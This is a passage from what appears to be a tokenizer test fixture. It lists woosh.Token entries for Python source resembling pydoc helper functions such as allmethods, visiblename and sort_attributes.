woosh.Token(woosh.NAME, 'self', 242, 37, 242, 41),
woosh.Token(woosh.OP, ')', 242, 41, 242, 42),
woosh.Token(woosh.NAME, 'or', 242, 43, 242, 45),
woosh.Token(woosh.OP, '(', 242, 46, 242, 47),
woosh.Token(woosh.NAME, 'self', 242, 47, 242, 51),
woosh.Token(woosh.NAME, 'is', 242, 52, 242, 54),
woosh.Token(woosh.NAME, 'None', 242, 55, 242, 59),
woosh.Token(woosh.OP, ')', 242, 59, 242, 60),
woosh.Token(woosh.OP, ')', 242, 60, 242, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 242, 61, 243, 0),
woosh.Token(woosh.DEDENT, ' ', 243, 0, 243, 4),
woosh.Token(woosh.NAME, 'return', 243, 4, 243, 10),
woosh.Token(woosh.NAME, 'False', 243, 11, 243, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 243, 16, 244, 0),
woosh.Token(woosh.DEDENT, '', 246, 0, 246, 0),
woosh.Token(woosh.NAME, 'def', 246, 0, 246, 3),
woosh.Token(woosh.NAME, 'allmethods', 246, 4, 246, 14),
woosh.Token(woosh.OP, '(', 246, 14, 246, 15),
woosh.Token(woosh.NAME, 'cl', 246, 15, 246, 17),
woosh.Token(woosh.OP, ')', 246, 17, 246, 18),
woosh.Token(woosh.OP, ':', 246, 18, 246, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 246, 19, 247, 0),
woosh.Token(woosh.INDENT, ' ', 247, 0, 247, 4),
woosh.Token(woosh.NAME, 'methods', 247, 4, 247, 11),
woosh.Token(woosh.OP, '=', 247, 12, 247, 13),
woosh.Token(woosh.OP, '{', 247, 14, 247, 15),
woosh.Token(woosh.OP, '}', 247, 15, 247, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 247, 16, 248, 0),
woosh.Token(woosh.NAME, 'for', 248, 4, 248, 7),
woosh.Token(woosh.NAME, 'key', 248, 8, 248, 11),
woosh.Token(woosh.OP, ',', 248, 11, 248, 12),
woosh.Token(woosh.NAME, 'value', 248, 13, 248, 18),
woosh.Token(woosh.NAME, 'in', 248, 19, 248, 21),
woosh.Token(woosh.NAME, 'inspect', 248, 22, 248, 29),
woosh.Token(woosh.OP, '.', 248, 29, 248, 30),
woosh.Token(woosh.NAME, 'getmembers', 248, 30, 248, 40),
woosh.Token(woosh.OP, '(', 248, 40, 248, 41),
woosh.Token(woosh.NAME, 'cl', 248, 41, 248, 43),
woosh.Token(woosh.OP, ',', 248, 43, 248, 44),
woosh.Token(woosh.NAME, 'inspect', 248, 45, 248, 52),
woosh.Token(woosh.OP, '.', 248, 52, 248, 53),
woosh.Token(woosh.NAME, 'isroutine', 248, 53, 248, 62),
woosh.Token(woosh.OP, ')', 248, 62, 248, 63),
woosh.Token(woosh.OP, ':', 248, 63, 248, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 248, 64, 249, 0),
woosh.Token(woosh.INDENT, ' ', 249, 0, 249, 8),
woosh.Token(woosh.NAME, 'methods', 249, 8, 249, 15),
woosh.Token(woosh.OP, '[', 249, 15, 249, 16),
woosh.Token(woosh.NAME, 'key', 249, 16, 249, 19),
woosh.Token(woosh.OP, ']', 249, 19, 249, 20),
woosh.Token(woosh.OP, '=', 249, 21, 249, 22),
woosh.Token(woosh.NUMBER, '1', 249, 23, 249, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 249, 24, 250, 0),
woosh.Token(woosh.DEDENT, ' ', 250, 0, 250, 4),
woosh.Token(woosh.NAME, 'for', 250, 4, 250, 7),
woosh.Token(woosh.NAME, 'base', 250, 8, 250, 12),
woosh.Token(woosh.NAME, 'in', 250, 13, 250, 15),
woosh.Token(woosh.NAME, 'cl', 250, 16, 250, 18),
woosh.Token(woosh.OP, '.', 250, 18, 250, 19),
woosh.Token(woosh.NAME, '__bases__', 250, 19, 250, 28),
woosh.Token(woosh.OP, ':', 250, 28, 250, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 250, 29, 251, 0),
woosh.Token(woosh.INDENT, ' ', 251, 0, 251, 8),
woosh.Token(woosh.NAME, 'methods', 251, 8, 251, 15),
woosh.Token(woosh.OP, '.', 251, 15, 251, 16),
woosh.Token(woosh.NAME, 'update', 251, 16, 251, 22),
woosh.Token(woosh.OP, '(', 251, 22, 251, 23),
woosh.Token(woosh.NAME, 'allmethods', 251, 23, 251, 33),
woosh.Token(woosh.OP, '(', 251, 33, 251, 34),
woosh.Token(woosh.NAME, 'base', 251, 34, 251, 38),
woosh.Token(woosh.OP, ')', 251, 38, 251, 39),
woosh.Token(woosh.OP, ')', 251, 39, 251, 40),
woosh.Token(woosh.COMMENT, '# all your base are belong to us', 251, 41, 251, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 251, 73, 252, 0),
woosh.Token(woosh.DEDENT, ' ', 252, 0, 252, 4),
woosh.Token(woosh.NAME, 'for', 252, 4, 252, 7),
woosh.Token(woosh.NAME, 'key', 252, 8, 252, 11),
woosh.Token(woosh.NAME, 'in', 252, 12, 252, 14),
woosh.Token(woosh.NAME, 'methods', 252, 15, 252, 22),
woosh.Token(woosh.OP, '.', 252, 22, 252, 23),
woosh.Token(woosh.NAME, 'keys', 252, 23, 252, 27),
woosh.Token(woosh.OP, '(', 252, 27, 252, 28),
woosh.Token(woosh.OP, ')', 252, 28, 252, 29),
woosh.Token(woosh.OP, ':', 252, 29, 252, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 252, 30, 253, 0),
woosh.Token(woosh.INDENT, ' ', 253, 0, 253, 8),
woosh.Token(woosh.NAME, 'methods', 253, 8, 253, 15),
woosh.Token(woosh.OP, '[', 253, 15, 253, 16),
woosh.Token(woosh.NAME, 'key', 253, 16, 253, 19),
woosh.Token(woosh.OP, ']', 253, 19, 253, 20),
woosh.Token(woosh.OP, '=', 253, 21, 253, 22),
woosh.Token(woosh.NAME, 'getattr', 253, 23, 253, 30),
woosh.Token(woosh.OP, '(', 253, 30, 253, 31),
woosh.Token(woosh.NAME, 'cl', 253, 31, 253, 33),
woosh.Token(woosh.OP, ',', 253, 33, 253, 34),
woosh.Token(woosh.NAME, 'key', 253, 35, 253, 38),
woosh.Token(woosh.OP, ')', 253, 38, 253, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 253, 39, 254, 0),
woosh.Token(woosh.DEDENT, ' ', 254, 0, 254, 4),
woosh.Token(woosh.NAME, 'return', 254, 4, 254, 10),
woosh.Token(woosh.NAME, 'methods', 254, 11, 254, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 254, 18, 255, 0),
woosh.Token(woosh.DEDENT, '', 256, 0, 256, 0),
woosh.Token(woosh.NAME, 'def', 256, 0, 256, 3),
woosh.Token(woosh.NAME, '_split_list', 256, 4, 256, 15),
woosh.Token(woosh.OP, '(', 256, 15, 256, 16),
woosh.Token(woosh.NAME, 's', 256, 16, 256, 17),
woosh.Token(woosh.OP, ',', 256, 17, 256, 18),
woosh.Token(woosh.NAME, 'predicate', 256, 19, 256, 28),
woosh.Token(woosh.OP, ')', 256, 28, 256, 29),
woosh.Token(woosh.OP, ':', 256, 29, 256, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 256, 30, 257, 0),
woosh.Token(woosh.INDENT, ' ', 257, 0, 257, 4),
woosh.Token(woosh.STRING, '"""Split sequence s via predicate, and return pair ([true], [false]).\r\n\r\n The return value is a 2-tuple of lists,\r\n ([x for x in s if predicate(x)],\r\n [x for x in s if not predicate(x)])\r\n """', 257, 4, 262, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 262, 7, 263, 0),
woosh.Token(woosh.NAME, 'yes', 264, 4, 264, 7),
woosh.Token(woosh.OP, '=', 264, 8, 264, 9),
woosh.Token(woosh.OP, '[', 264, 10, 264, 11),
woosh.Token(woosh.OP, ']', 264, 11, 264, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 264, 12, 265, 0),
woosh.Token(woosh.NAME, 'no', 265, 4, 265, 6),
woosh.Token(woosh.OP, '=', 265, 7, 265, 8),
woosh.Token(woosh.OP, '[', 265, 9, 265, 10),
woosh.Token(woosh.OP, ']', 265, 10, 265, 11),
woosh.Token(woosh.NEWLINE, '\r\n', 265, 11, 266, 0),
woosh.Token(woosh.NAME, 'for', 266, 4, 266, 7),
woosh.Token(woosh.NAME, 'x', 266, 8, 266, 9),
woosh.Token(woosh.NAME, 'in', 266, 10, 266, 12),
woosh.Token(woosh.NAME, 's', 266, 13, 266, 14),
woosh.Token(woosh.OP, ':', 266, 14, 266, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 266, 15, 267, 0),
woosh.Token(woosh.INDENT, ' ', 267, 0, 267, 8),
woosh.Token(woosh.NAME, 'if', 267, 8, 267, 10),
woosh.Token(woosh.NAME, 'predicate', 267, 11, 267, 20),
woosh.Token(woosh.OP, '(', 267, 20, 267, 21),
woosh.Token(woosh.NAME, 'x', 267, 21, 267, 22),
woosh.Token(woosh.OP, ')', 267, 22, 267, 23),
woosh.Token(woosh.OP, ':', 267, 23, 267, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 267, 24, 268, 0),
woosh.Token(woosh.INDENT, ' ', 268, 0, 268, 12),
woosh.Token(woosh.NAME, 'yes', 268, 12, 268, 15),
woosh.Token(woosh.OP, '.', 268, 15, 268, 16),
woosh.Token(woosh.NAME, 'append', 268, 16, 268, 22),
woosh.Token(woosh.OP, '(', 268, 22, 268, 23),
woosh.Token(woosh.NAME, 'x', 268, 23, 268, 24),
woosh.Token(woosh.OP, ')', 268, 24, 268, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 268, 25, 269, 0),
woosh.Token(woosh.DEDENT, ' ', 269, 0, 269, 8),
woosh.Token(woosh.NAME, 'else', 269, 8, 269, 12),
woosh.Token(woosh.OP, ':', 269, 12, 269, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 269, 13, 270, 0),
woosh.Token(woosh.INDENT, ' ', 270, 0, 270, 12),
woosh.Token(woosh.NAME, 'no', 270, 12, 270, 14),
woosh.Token(woosh.OP, '.', 270, 14, 270, 15),
woosh.Token(woosh.NAME, 'append', 270, 15, 270, 21),
woosh.Token(woosh.OP, '(', 270, 21, 270, 22),
woosh.Token(woosh.NAME, 'x', 270, 22, 270, 23),
woosh.Token(woosh.OP, ')', 270, 23, 270, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 270, 24, 271, 0),
woosh.Token(woosh.DEDENT, ' ', 271, 0, 271, 4),
woosh.Token(woosh.DEDENT, '', 271, 4, 271, 4),
woosh.Token(woosh.NAME, 'return', 271, 4, 271, 10),
woosh.Token(woosh.NAME, 'yes', 271, 11, 271, 14),
woosh.Token(woosh.OP, ',', 271, 14, 271, 15),
woosh.Token(woosh.NAME, 'no', 271, 16, 271, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 271, 18, 272, 0),
woosh.Token(woosh.DEDENT, '', 273, 0, 273, 0),
woosh.Token(woosh.NAME, 'def', 273, 0, 273, 3),
woosh.Token(woosh.NAME, 'visiblename', 273, 4, 273, 15),
woosh.Token(woosh.OP, '(', 273, 15, 273, 16),
woosh.Token(woosh.NAME, 'name', 273, 16, 273, 20),
woosh.Token(woosh.OP, ',', 273, 20, 273, 21),
woosh.Token(woosh.NAME, 'all', 273, 22, 273, 25),
woosh.Token(woosh.OP, '=', 273, 25, 273, 26),
woosh.Token(woosh.NAME, 'None', 273, 26, 273, 30),
woosh.Token(woosh.OP, ',', 273, 30, 273, 31),
woosh.Token(woosh.NAME, 'obj', 273, 32, 273, 35),
woosh.Token(woosh.OP, '=', 273, 35, 273, 36),
woosh.Token(woosh.NAME, 'None', 273, 36, 273, 40),
woosh.Token(woosh.OP, ')', 273, 40, 273, 41),
woosh.Token(woosh.OP, ':', 273, 41, 273, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 273, 42, 274, 0),
woosh.Token(woosh.INDENT, ' ', 274, 0, 274, 4),
woosh.Token(woosh.STRING, '"""Decide whether to show documentation on a variable."""', 274, 4, 274, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 274, 61, 275, 0),
woosh.Token(woosh.COMMENT, '# Certain special names are redundant or internal.', 275, 4, 275, 54),
woosh.Token(woosh.COMMENT, '# XXX Remove __initializing__?', 276, 4, 276, 34),
woosh.Token(woosh.NAME, 'if', 277, 4, 277, 6),
woosh.Token(woosh.NAME, 'name', 277, 7, 277, 11),
woosh.Token(woosh.NAME, 'in', 277, 12, 277, 14),
woosh.Token(woosh.OP, '{', 277, 15, 277, 16),
woosh.Token(woosh.STRING, "'__author__'", 277, 16, 277, 28),
woosh.Token(woosh.OP, ',', 277, 28, 277, 29),
woosh.Token(woosh.STRING, "'__builtins__'", 277, 30, 277, 44),
woosh.Token(woosh.OP, ',', 277, 44, 277, 45),
woosh.Token(woosh.STRING, "'__cached__'", 277, 46, 277, 58),
woosh.Token(woosh.OP, ',', 277, 58, 277, 59),
woosh.Token(woosh.STRING, "'__credits__'", 277, 60, 277, 73),
woosh.Token(woosh.OP, ',', 277, 73, 277, 74),
woosh.Token(woosh.STRING, "'__date__'", 278, 16, 278, 26),
woosh.Token(woosh.OP, ',', 278, 26, 278, 27),
woosh.Token(woosh.STRING, "'__doc__'", 278, 28, 278, 37),
woosh.Token(woosh.OP, ',', 278, 37, 278, 38),
woosh.Token(woosh.STRING, "'__file__'", 278, 39, 278, 49),
woosh.Token(woosh.OP, ',', 278, 49, 278, 50),
woosh.Token(woosh.STRING, "'__spec__'", 278, 51, 278, 61),
woosh.Token(woosh.OP, ',', 278, 61, 278, 62),
woosh.Token(woosh.STRING, "'__loader__'", 279, 16, 279, 28),
woosh.Token(woosh.OP, ',', 279, 28, 279, 29),
woosh.Token(woosh.STRING, "'__module__'", 279, 30, 279, 42),
woosh.Token(woosh.OP, ',', 279, 42, 279, 43),
woosh.Token(woosh.STRING, "'__name__'", 279, 44, 279, 54),
woosh.Token(woosh.OP, ',', 279, 54, 279, 55),
woosh.Token(woosh.STRING, "'__package__'", 279, 56, 279, 69),
woosh.Token(woosh.OP, ',', 279, 69, 279, 70),
woosh.Token(woosh.STRING, "'__path__'", 280, 16, 280, 26),
woosh.Token(woosh.OP, ',', 280, 26, 280, 27),
woosh.Token(woosh.STRING, "'__qualname__'", 280, 28, 280, 42),
woosh.Token(woosh.OP, ',', 280, 42, 280, 43),
woosh.Token(woosh.STRING, "'__slots__'", 280, 44, 280, 55),
woosh.Token(woosh.OP, ',', 280, 55, 280, 56),
woosh.Token(woosh.STRING, "'__version__'", 280, 57, 280, 70),
woosh.Token(woosh.OP, '}', 280, 70, 280, 71),
woosh.Token(woosh.OP, ':', 280, 71, 280, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 280, 72, 281, 0),
woosh.Token(woosh.INDENT, ' ', 281, 0, 281, 8),
woosh.Token(woosh.NAME, 'return', 281, 8, 281, 14),
woosh.Token(woosh.NUMBER, '0', 281, 15, 281, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 281, 16, 282, 0),
woosh.Token(woosh.COMMENT, '# Private names are hidden, but special names are displayed.', 282, 4, 282, 64),
woosh.Token(woosh.DEDENT, ' ', 283, 0, 283, 4),
woosh.Token(woosh.NAME, 'if', 283, 4, 283, 6),
woosh.Token(woosh.NAME, 'name', 283, 7, 283, 11),
woosh.Token(woosh.OP, '.', 283, 11, 283, 12),
woosh.Token(woosh.NAME, 'startswith', 283, 12, 283, 22),
woosh.Token(woosh.OP, '(', 283, 22, 283, 23),
woosh.Token(woosh.STRING, "'__'", 283, 23, 283, 27),
woosh.Token(woosh.OP, ')', 283, 27, 283, 28),
woosh.Token(woosh.NAME, 'and', 283, 29, 283, 32),
woosh.Token(woosh.NAME, 'name', 283, 33, 283, 37),
woosh.Token(woosh.OP, '.', 283, 37, 283, 38),
woosh.Token(woosh.NAME, 'endswith', 283, 38, 283, 46),
woosh.Token(woosh.OP, '(', 283, 46, 283, 47),
woosh.Token(woosh.STRING, "'__'", 283, 47, 283, 51),
woosh.Token(woosh.OP, ')', 283, 51, 283, 52),
woosh.Token(woosh.OP, ':', 283, 52, 283, 53),
woosh.Token(woosh.NAME, 'return', 283, 54, 283, 60),
woosh.Token(woosh.NUMBER, '1', 283, 61, 283, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 283, 62, 284, 0),
woosh.Token(woosh.COMMENT, '# Namedtuples have public fields and methods with a single leading underscore', 284, 4, 284, 81),
woosh.Token(woosh.NAME, 'if', 285, 4, 285, 6),
woosh.Token(woosh.NAME, 'name', 285, 7, 285, 11),
woosh.Token(woosh.OP, '.', 285, 11, 285, 12),
woosh.Token(woosh.NAME, 'startswith', 285, 12, 285, 22),
woosh.Token(woosh.OP, '(', 285, 22, 285, 23),
woosh.Token(woosh.STRING, "'_'", 285, 23, 285, 26),
woosh.Token(woosh.OP, ')', 285, 26, 285, 27),
woosh.Token(woosh.NAME, 'and', 285, 28, 285, 31),
woosh.Token(woosh.NAME, 'hasattr', 285, 32, 285, 39),
woosh.Token(woosh.OP, '(', 285, 39, 285, 40),
woosh.Token(woosh.NAME, 'obj', 285, 40, 285, 43),
woosh.Token(woosh.OP, ',', 285, 43, 285, 44),
woosh.Token(woosh.STRING, "'_fields'", 285, 45, 285, 54),
woosh.Token(woosh.OP, ')', 285, 54, 285, 55),
woosh.Token(woosh.OP, ':', 285, 55, 285, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 285, 56, 286, 0),
woosh.Token(woosh.INDENT, ' ', 286, 0, 286, 8),
woosh.Token(woosh.NAME, 'return', 286, 8, 286, 14),
woosh.Token(woosh.NAME, 'True', 286, 15, 286, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 286, 19, 287, 0),
woosh.Token(woosh.DEDENT, ' ', 287, 0, 287, 4),
woosh.Token(woosh.NAME, 'if', 287, 4, 287, 6),
woosh.Token(woosh.NAME, 'all', 287, 7, 287, 10),
woosh.Token(woosh.NAME, 'is', 287, 11, 287, 13),
woosh.Token(woosh.NAME, 'not', 287, 14, 287, 17),
woosh.Token(woosh.NAME, 'None', 287, 18, 287, 22),
woosh.Token(woosh.OP, ':', 287, 22, 287, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 287, 23, 288, 0),
woosh.Token(woosh.COMMENT, '# only document that which the programmer exported in __all__', 288, 8, 288, 69),
woosh.Token(woosh.INDENT, ' ', 289, 0, 289, 8),
woosh.Token(woosh.NAME, 'return', 289, 8, 289, 14),
woosh.Token(woosh.NAME, 'name', 289, 15, 289, 19),
woosh.Token(woosh.NAME, 'in', 289, 20, 289, 22),
woosh.Token(woosh.NAME, 'all', 289, 23, 289, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 289, 26, 290, 0),
woosh.Token(woosh.DEDENT, ' ', 290, 0, 290, 4),
woosh.Token(woosh.NAME, 'else', 290, 4, 290, 8),
woosh.Token(woosh.OP, ':', 290, 8, 290, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 290, 9, 291, 0),
woosh.Token(woosh.INDENT, ' ', 291, 0, 291, 8),
woosh.Token(woosh.NAME, 'return', 291, 8, 291, 14),
woosh.Token(woosh.NAME, 'not', 291, 15, 291, 18),
woosh.Token(woosh.NAME, 'name', 291, 19, 291, 23),
woosh.Token(woosh.OP, '.', 291, 23, 291, 24),
woosh.Token(woosh.NAME, 'startswith', 291, 24, 291, 34),
woosh.Token(woosh.OP, '(', 291, 34, 291, 35),
woosh.Token(woosh.STRING, "'_'", 291, 35, 291, 38),
woosh.Token(woosh.OP, ')', 291, 38, 291, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 291, 39, 292, 0),
woosh.Token(woosh.DEDENT, '', 293, 0, 293, 0),
woosh.Token(woosh.DEDENT, '', 293, 0, 293, 0),
woosh.Token(woosh.NAME, 'def', 293, 0, 293, 3),
woosh.Token(woosh.NAME, 'classify_class_attrs', 293, 4, 293, 24),
woosh.Token(woosh.OP, '(', 293, 24, 293, 25),
woosh.Token(woosh.NAME, 'object', 293, 25, 293, 31),
woosh.Token(woosh.OP, ')', 293, 31, 293, 32),
woosh.Token(woosh.OP, ':', 293, 32, 293, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 293, 33, 294, 0),
woosh.Token(woosh.INDENT, ' ', 294, 0, 294, 4),
woosh.Token(woosh.STRING, '"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""', 294, 4, 294, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 294, 77, 295, 0),
woosh.Token(woosh.NAME, 'results', 295, 4, 295, 11),
woosh.Token(woosh.OP, '=', 295, 12, 295, 13),
woosh.Token(woosh.OP, '[', 295, 14, 295, 15),
woosh.Token(woosh.OP, ']', 295, 15, 295, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 295, 16, 296, 0),
woosh.Token(woosh.NAME, 'for', 296, 4, 296, 7),
woosh.Token(woosh.OP, '(', 296, 8, 296, 9),
woosh.Token(woosh.NAME, 'name', 296, 9, 296, 13),
woosh.Token(woosh.OP, ',', 296, 13, 296, 14),
woosh.Token(woosh.NAME, 'kind', 296, 15, 296, 19),
woosh.Token(woosh.OP, ',', 296, 19, 296, 20),
woosh.Token(woosh.NAME, 'cls', 296, 21, 296, 24),
woosh.Token(woosh.OP, ',', 296, 24, 296, 25),
woosh.Token(woosh.NAME, 'value', 296, 26, 296, 31),
woosh.Token(woosh.OP, ')', 296, 31, 296, 32),
woosh.Token(woosh.NAME, 'in', 296, 33, 296, 35),
woosh.Token(woosh.NAME, 'inspect', 296, 36, 296, 43),
woosh.Token(woosh.OP, '.', 296, 43, 296, 44),
woosh.Token(woosh.NAME, 'classify_class_attrs', 296, 44, 296, 64),
woosh.Token(woosh.OP, '(', 296, 64, 296, 65),
woosh.Token(woosh.NAME, 'object', 296, 65, 296, 71),
woosh.Token(woosh.OP, ')', 296, 71, 296, 72),
woosh.Token(woosh.OP, ':', 296, 72, 296, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 296, 73, 297, 0),
woosh.Token(woosh.INDENT, ' ', 297, 0, 297, 8),
woosh.Token(woosh.NAME, 'if', 297, 8, 297, 10),
woosh.Token(woosh.NAME, 'inspect', 297, 11, 297, 18),
woosh.Token(woosh.OP, '.', 297, 18, 297, 19),
woosh.Token(woosh.NAME, 'isdatadescriptor', 297, 19, 297, 35),
woosh.Token(woosh.OP, '(', 297, 35, 297, 36),
woosh.Token(woosh.NAME, 'value', 297, 36, 297, 41),
woosh.Token(woosh.OP, ')', 297, 41, 297, 42),
woosh.Token(woosh.OP, ':', 297, 42, 297, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 297, 43, 298, 0),
woosh.Token(woosh.INDENT, ' ', 298, 0, 298, 12),
woosh.Token(woosh.NAME, 'kind', 298, 12, 298, 16),
woosh.Token(woosh.OP, '=', 298, 17, 298, 18),
woosh.Token(woosh.STRING, "'data descriptor'", 298, 19, 298, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 298, 36, 299, 0),
woosh.Token(woosh.NAME, 'if', 299, 12, 299, 14),
woosh.Token(woosh.NAME, 'isinstance', 299, 15, 299, 25),
woosh.Token(woosh.OP, '(', 299, 25, 299, 26),
woosh.Token(woosh.NAME, 'value', 299, 26, 299, 31),
woosh.Token(woosh.OP, ',', 299, 31, 299, 32),
woosh.Token(woosh.NAME, 'property', 299, 33, 299, 41),
woosh.Token(woosh.OP, ')', 299, 41, 299, 42),
woosh.Token(woosh.NAME, 'and', 299, 43, 299, 46),
woosh.Token(woosh.NAME, 'value', 299, 47, 299, 52),
woosh.Token(woosh.OP, '.', 299, 52, 299, 53),
woosh.Token(woosh.NAME, 'fset', 299, 53, 299, 57),
woosh.Token(woosh.NAME, 'is', 299, 58, 299, 60),
woosh.Token(woosh.NAME, 'None', 299, 61, 299, 65),
woosh.Token(woosh.OP, ':', 299, 65, 299, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 299, 66, 300, 0),
woosh.Token(woosh.INDENT, ' ', 300, 0, 300, 16),
woosh.Token(woosh.NAME, 'kind', 300, 16, 300, 20),
woosh.Token(woosh.OP, '=', 300, 21, 300, 22),
woosh.Token(woosh.STRING, "'readonly property'", 300, 23, 300, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 300, 42, 301, 0),
woosh.Token(woosh.DEDENT, ' ', 301, 0, 301, 8),
woosh.Token(woosh.DEDENT, '', 301, 8, 301, 8),
woosh.Token(woosh.NAME, 'results', 301, 8, 301, 15),
woosh.Token(woosh.OP, '.', 301, 15, 301, 16),
woosh.Token(woosh.NAME, 'append', 301, 16, 301, 22),
woosh.Token(woosh.OP, '(', 301, 22, 301, 23),
woosh.Token(woosh.OP, '(', 301, 23, 301, 24),
woosh.Token(woosh.NAME, 'name', 301, 24, 301, 28),
woosh.Token(woosh.OP, ',', 301, 28, 301, 29),
woosh.Token(woosh.NAME, 'kind', 301, 30, 301, 34),
woosh.Token(woosh.OP, ',', 301, 34, 301, 35),
woosh.Token(woosh.NAME, 'cls', 301, 36, 301, 39),
woosh.Token(woosh.OP, ',', 301, 39, 301, 40),
woosh.Token(woosh.NAME, 'value', 301, 41, 301, 46),
woosh.Token(woosh.OP, ')', 301, 46, 301, 47),
woosh.Token(woosh.OP, ')', 301, 47, 301, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 301, 48, 302, 0),
woosh.Token(woosh.DEDENT, ' ', 302, 0, 302, 4),
woosh.Token(woosh.NAME, 'return', 302, 4, 302, 10),
woosh.Token(woosh.NAME, 'results', 302, 11, 302, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 302, 18, 303, 0),
woosh.Token(woosh.DEDENT, '', 304, 0, 304, 0),
woosh.Token(woosh.NAME, 'def', 304, 0, 304, 3),
woosh.Token(woosh.NAME, 'sort_attributes', 304, 4, 304, 19),
woosh.Token(woosh.OP, '(', 304, 19, 304, 20),
woosh.Token(woosh.NAME, 'attrs', 304, 20, 304, 25),
woosh.Token(woosh.OP, ',', 304, 25, 304, 26),
woosh.Token(woosh.NAME, 'object', 304, 27, 304, 33),
woosh.Token(woosh.OP, ')', 304, 33, 304, 34),
woosh.Token(woosh.OP, ':', 304, 34, 304, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 304, 35, 305, 0),
woosh.Token(woosh.INDENT, ' ', 305, 0, 305, 4),
woosh.Token(woosh.STRING, "'Sort the attrs list in-place by _fields and then alphabetically by name'", 305, 4, 305, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 305, 77, 306, 0),
woosh.Token(woosh.COMMENT, '# This allows data descriptors to be ordered according', 306, 4, 306, 58),
woosh.Token(woosh.COMMENT, '# to a _fields attribute if present.', 307, 4, 307, 40),
woosh.Token(woosh.NAME, 'fields', 308, 4, 308, 10),
woosh.Token(woosh.OP, '=', 308, 11, 308, 12),
woosh.Token(woosh.NAME, 'getattr', 308, 13, 308, 20),
woosh.Token(woosh.OP, '(', 308, 20, 308, 21),
woosh.Token(woosh.NAME, 'object', 308, 21, 308, 27),
woosh.Token(woosh.OP, ',', 308, 27, 308, 28),
woosh.Token(woosh.STRING, "'_fields'", 308, 29, 308, 38),
woosh.Token(woosh.OP, ',', 308, 38, 308, 39),
woosh.Token(woosh.OP, '[', 308, 40, 308, 41),
woosh.Token(woosh.OP, ']', 308, 41, 308, 42),
woosh.Token(woosh.OP, ')', 308, 42, 308, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 308, 43, 309, 0),
woosh.Token(woosh.NAME, 'try', 309, 4, 309, 7),
woosh.Token(woosh.OP, ':', 309, 7, 309, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 309, 8, 310, 0),
woosh.Token(woosh.INDENT, ' ', 310, 0, 310, 8),
woosh.Token(woosh.NAME, 'field_order', 310, 8, 310, 19),
woosh.Token(woosh.OP, '=', 310, 20, 310, 21),
woosh.Token(woosh.OP, '{', 310, 22, 310, 23),
woosh.Token(woosh.NAME, 'name', 310, 23, 310, 27),
woosh.Token(woosh.OP, ':', 310, 28, 310, 29),
woosh.Token(woosh.NAME, 'i', 310, 30, 310, 31),
woosh.Token(woosh.OP, '-', 310, 31, 310, 32),
woosh.Token(woosh.NAME, 'len', 310, 32, 310, 35),
woosh.Token(woosh.OP, '(', 310, 35, 310, 36),
woosh.Token(woosh.NAME, 'fields', 310, 36, 310, 42),
woosh.Token(woosh.OP, ')', 310, 42, 310, 43),
woosh.Token(woosh.NAME, 'for', 310, 44, 310, 47),
woosh.Token(woosh.OP, '(', 310, 48, 310, 49),
woosh.Token(woosh.NAME, 'i', 310, 49, 310, 50),
woosh.Token(woosh.OP, ',', 310, 50, 310, 51),
woosh.Token(woosh.NAME, 'name', 310, 52, 310, 56),
woosh.Token(woosh.OP, ')', 310, 56, 310, 57),
woosh.Token(woosh.NAME, 'in', 310, 58, 310, 60),
woosh.Token(woosh.NAME, 'enumerate', 310, 61, 310, 70),
woosh.Token(woosh.OP, '(', 310, 70, 310, 71),
woosh.Token(woosh.NAME, 'fields', 310, 71, 310, 77),
woosh.Token(woosh.OP, ')', 310, 77, 310, 78),
woosh.Token(woosh.OP, '}', 310, 78, 310, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 310, 79, 311, 0),
woosh.Token(woosh.DEDENT, ' ', 311, 0, 311, 4),
woosh.Token(woosh.NAME, 'except', 311, 4, 311, 10),
woosh.Token(woosh.NAME, 'TypeError', 311, 11, 311, 20),
woosh.Token(woosh.OP, ':', 311, 20, 311, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 311, 21, 312, 0),
woosh.Token(woosh.INDENT, ' ', 312, 0, 312, 8),
woosh.Token(woosh.NAME, 'field_order', 312, 8, 312, 19),
woosh.Token(woosh.OP, '=', 312, 20, 312, 21),
woosh.Token(woosh.OP, '{', 312, 22, 312, 23),
